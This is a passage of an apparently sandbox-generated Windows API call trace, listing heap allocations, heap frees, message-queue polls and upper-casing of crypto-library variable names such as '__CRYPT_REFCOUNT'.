hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.904] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0223.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0223.904] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0223.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0223.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0223.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0223.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0223.904] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0223.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0223.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0223.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0223.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0223.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0223.904] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0223.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0223.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0223.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0223.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0223.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0223.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0223.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0223.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0223.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0223.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0223.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0223.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0223.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0223.985] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0223.985] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0223.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0223.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0223.985] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0223.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0223.985] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0223.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0223.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0223.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0223.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0223.986] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0223.986] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.986] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0223.986] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0223.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0223.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0223.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0223.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0223.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0223.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0223.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.988] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0223.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0223.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0223.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0223.988] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0223.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0223.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0223.989] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0223.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0223.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0223.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0223.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0223.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0223.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0223.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0223.990] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0223.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0223.990] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0223.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0223.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0223.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0223.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0223.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0223.991] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0223.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0223.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0223.991] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0223.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0223.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.991] HeapFree (in: hHeap=0x970000, 